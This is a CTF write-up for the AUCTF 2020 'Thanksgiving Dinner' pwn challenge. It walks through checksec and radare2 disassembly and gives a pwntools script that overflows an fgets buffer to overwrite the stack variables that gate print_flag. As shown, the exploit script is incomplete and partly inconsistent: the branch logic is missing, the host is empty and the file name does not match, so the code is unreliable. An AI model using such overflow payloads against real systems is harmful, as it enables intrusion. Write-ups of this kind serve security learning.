AUCTF 2020 Writeup - Thanksgiving Dinner

April 19, 2020
ctf writeup pwn x86 auctf2020


This is the second pwn challenge of AUCTF 2020. It was solved 238 times and it was worth 408 points.


I just ate a huge dinner. I can barley eat anymore… so please don’t give me too much!

nc 30011

Note: ASLR is disabled for this challenge

You could download the binary here

$ sha256sum ./thanksgiving_dinner
2307af59beead6a2377c3beb2ff26f70d5732ec6b651b5c31e58b8f692bfb70c thanksgiving_dinner


The program simply ask for an input. But it seems not vulnerable to a buffer overflow:

$ ./thanksgiving_dinner
Welcome to my program... it's a little buggy...
Hey I heard you are searching for flags! Well I've got one. :)
Here you can have part of it!

Sorry that's all I got!


So I checked the binary with checksec. Then I opened with radare2.

$ checksec ./thanksgiving_dinner
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
$ r2 -Ad ./thanksgiving_dinner

Then I found two promising functions:

[r2]> afl
0x56556250    7 198          sym.vulnerable
0x56556360    3 162          sym.print_flag
[r2]> axt sym.vulnerable
main 0x5655623c [CALL] call sym.vulnerable
[r2]> axt sym.print_flag
sym.vulnerable 0x5655630b [CALL] call sym.print_flag

The vulnerable function is called by main. The print_flag function is called by vulnerable.

So here is the interesting part about the latter.

It gets an input a string and if some values are correct print_flag is called. Thanks the fgets we can overwrite those variables easily:

[r2]> pdf @sym.vulnerable
│           0x565562d9      6a24           push 0x24                   ; 36
│           0x565562db      8d45d4         lea eax, [var_2ch]
│           0x565562de      50             push eax
│           0x565562df      e85cfdffff     call sym.imp.fgets
│           0x565562e4      83c410         add esp, 0x10
│           0x565562e7      817df4371300.  cmp dword [var_ch], 0x1337
│       ┌─< 0x565562ee      7520           jne 0x56556310
│       │   0x565562f0      837df0ec       cmp dword [var_10h], 0xffffffec
│      ┌──< 0x565562f4      7d1a           jge 0x56556310
│      ││   0x565562f6      837de814       cmp dword [var_18h], 0x14
│     ┌───< 0x565562fa      7414           je 0x56556310
│     │││   0x565562fc      817dec637466.  cmp dword [var_14h], 0x667463
│    ┌────< 0x56556303      750b           jne 0x56556310
│    ││││   0x56556305      837de42a       cmp dword [var_1ch], 0x2a
│   ┌─────< 0x56556309      7505           jne 0x56556310
│   │││││   0x5655630b      e850000000     call sym.print_flag
│   └└└└└─> 0x56556310      90             nop
│           0x56556311      8b5dfc         mov ebx, dword [var_4h]
│           0x56556314      c9             leave
└           0x56556315      c3             ret

So this is my exploit:


from pwn import *

prog = context.binary = ELF(os.getcwd() + "/turkey", checksec=False)

if len(sys.argv) > 1:
        host = ""
        port = 30011
        t = remote(host, port)
        t = prog.process()

offset = 16
payload = "A"*offset
payload += pack(0x2a)       # var_1ch
payload += pack(0x15)       # var_18h
payload += pack(0x667463)   # var_14h
payload += pack(0xffffffeb) # var_10h
payload += pack(0x1337)     # var_ch


And this is the flag:

$ cat flag.txt

thanksgiving dinner solved banner

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